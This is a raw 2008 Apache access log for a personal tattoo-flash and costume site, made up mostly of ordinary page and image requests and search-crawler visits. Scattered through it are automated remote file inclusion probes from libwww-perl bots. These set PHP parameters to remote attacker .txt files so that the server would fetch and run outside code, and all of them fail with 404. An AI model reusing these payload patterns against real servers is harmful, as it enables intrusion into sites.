72.232.214.82 - - [10/May/2008:01:27:09 -0500] "GET /modules/xfsection/modify.php?dir_module=http://nodaorlz.100webspace.net/test.txt??? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
194.112.190.5 - - [10/May/2008:01:30:01 -0500] "GET /logs/header.php?tpl_pgb_moddir=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.112.190.5 - - [10/May/2008:01:30:02 -0500] "GET /header.php?tpl_pgb_moddir=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
123.100.83.189 - - [10/May/2008:01:38:23 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?sourceid=navclient&aq=t&ie=UTF-8&rlz=1T4ADBF_enNZ268NZ269&q=vintage+tattoo+flash""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:24 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:24 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:32 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:32 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:32 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:33 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:33 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:33 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:33 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:34 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:34 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:34 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:34 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:53 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:53 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:53 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:54 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:55 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:55 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:55 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:55 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:55 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:55 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:38:56 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:10 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1991 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:10 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:10 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:11 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:11 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:11 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:11 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:11 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:12 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:12 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:12 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:25 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:25 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:25 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
123.100.83.189 - - [10/May/2008:01:39:25 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
63.247.138.209 - - [10/May/2008:01:40:28 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
63.247.138.209 - - [10/May/2008:01:40:28 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
74.6.22.32 - - [10/May/2008:01:42:04 -0500] "GET /logs/access_log.1207785600 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.112.190.5 - - [10/May/2008:01:42:51 -0500] "GET /logs/errors.php?error=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 299 "-""libwww-perl/5.803"
194.112.190.5 - - [10/May/2008:01:42:52 -0500] "GET /errors.php?error=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 294 "-""libwww-perl/5.803"
74.6.19.156 - - [10/May/2008:01:42:55 -0500] "GET /logs/access_log.1158796800 HTTP/1.0" 200 160228 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.34.17 - - [10/May/2008:01:45:55 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:01:45:55 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
67.195.37.172 - - [10/May/2008:01:46:32 -0500] "GET /costume/costume1.htm HTTP/1.0" 200 4913 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.58.138.166 - - [10/May/2008:01:53:55 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:01:53:55 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:01:53:55 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
207.58.138.166 - - [10/May/2008:01:54:11 -0500] "GET /logs/access_log.1181952000/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
208.115.34.17 - - [10/May/2008:01:55:44 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:01:55:44 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:01:55:44 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:01:56:06 -0500] "GET /logs/access_log.1181952000/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
212.241.197.120 - - [10/May/2008:02:02:17 -0500] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
212.241.197.120 - - [10/May/2008:02:02:17 -0500] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
61.222.167.228 - - [10/May/2008:02:03:59 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/dalnethacker/suksesdalhackscan.txt?????? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
61.222.167.228 - - [10/May/2008:02:04:00 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://h1.ripway.com/dalnethacker/suksesdalhackscan.txt?????? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
67.19.61.90 - - [10/May/2008:02:08:21 -0500] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 321 "-""libwww-perl/5.811"
67.19.61.90 - - [10/May/2008:02:08:21 -0500] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.onyxclub.ru/administrator/components/com_remository/idf.txt? HTTP/1.1" 404 316 "-""libwww-perl/5.811"
74.6.19.238 - - [10/May/2008:02:12:38 -0500] "GET /logs/access_log.1188777600 HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
87.1.92.216 - - [10/May/2008:02:12:50 -0500] "GET /logs//appserv/main.php?appserv_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 306 "-""libwww-perl/5.808"
87.1.92.216 - - [10/May/2008:02:12:51 -0500] "GET //appserv/main.php?appserv_root=http://rpkns.com/media/idnews.txt? HTTP/1.1" 404 301 "-""libwww-perl/5.808"
70.85.96.74 - - [10/May/2008:02:20:07 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
70.85.96.74 - - [10/May/2008:02:20:07 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
70.85.96.74 - - [10/May/2008:02:20:07 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
70.85.96.74 - - [10/May/2008:02:20:09 -0500] "GET /logs/access_log.1204761600//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 340 "-""libwww-perl/5.811"
70.85.96.74 - - [10/May/2008:02:20:09 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 313 "-""libwww-perl/5.811"
70.85.96.74 - - [10/May/2008:02:20:09 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.imperialfutar.hu/on.txt??????? HTTP/1.1" 404 318 "-""libwww-perl/5.811"
80.65.76.195 - - [10/May/2008:02:21:08 -0500] "GET /logs//errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:02:21:17 -0500] "GET //errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:02:26:48 -0500] "GET /logs//errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
80.65.76.195 - - [10/May/2008:02:26:51 -0500] "GET //errors.php?error=http://www.hotghettomess.com/picture_library/pictures/com_pixel/r0x.id.txt??? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
208.115.34.17 - - [10/May/2008:02:28:09 -0500] "GET /logs/access_log.1207008000/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:02:28:10 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:02:28:10 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.810"
208.115.34.17 - - [10/May/2008:02:28:14 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.810"
74.6.27.26 - - [10/May/2008:02:30:33 -0500] "GET /costume/index1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
63.247.138.209 - - [10/May/2008:02:32:44 -0500] "GET /logs/access_log.1207008000/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
63.247.138.209 - - [10/May/2008:02:32:44 -0500] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 315 "-""libwww-perl/5.811"
63.247.138.209 - - [10/May/2008:02:32:44 -0500] "GET /logs/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.811"
63.247.138.209 - - [10/May/2008:02:32:46 -0500] "GET /logs/access_log.1207785600/faqsupport/samplefaqsupport.php?path[docroot]=http://soesy.barcah.web.id/readme.txt? HTTP/1.1" 404 342 "-""libwww-perl/5.811"
74.6.16.161 - - [10/May/2008:02:38:22 -0500] "GET /logs/access_log.1173312000 HTTP/1.0" 200 202873 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.76.45 - - [10/May/2008:02:38:58 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.24.57 - - [10/May/2008:02:42:05 -0500] "GET /logs/access_log.1172275200 HTTP/1.0" 200 152570 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
194.112.190.5 - - [10/May/2008:02:47:44 -0500] "GET /logs/access_log.1207785600/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
194.112.190.5 - - [10/May/2008:02:47:44 -0500] "GET /main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 292 "-""libwww-perl/5.803"
194.112.190.5 - - [10/May/2008:02:47:45 -0500] "GET /logs/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.803"
194.112.190.5 - - [10/May/2008:02:48:36 -0500] "GET /logs/access_log.1207180800/main.php?appserv_root=http://trilbardou.free.fr/ancien/id.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.803"
87.11.67.125 - - [10/May/2008:02:49:48 -0500] "GET /tattoo HTTP/1.1" 301 330 "http://search.live.com/results.aspx?mkt=it-it&FORM=TOOLBR&q=tom+tattoo&FORM=TBSP""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:49:49 -0500] "GET /tattoo/ HTTP/1.1" 200 466 "http://search.live.com/results.aspx?mkt=it-it&FORM=TOOLBR&q=tom+tattoo&FORM=TBSP""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:49:49 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:49:54 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://tomdolan.pconline.com/tattoo/""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:49:54 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:49:54 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:02 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 2378 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:03 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:03 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:03 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:03 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:03 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:03 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:04 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:04 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:04 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:04 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:16 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2214 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:17 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:17 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
87.11.67.125 - - [10/May/2008:02:50:17 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SIMBAR={5EB2591E-885B-48F8-8A59-AF974183C733}; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506)"
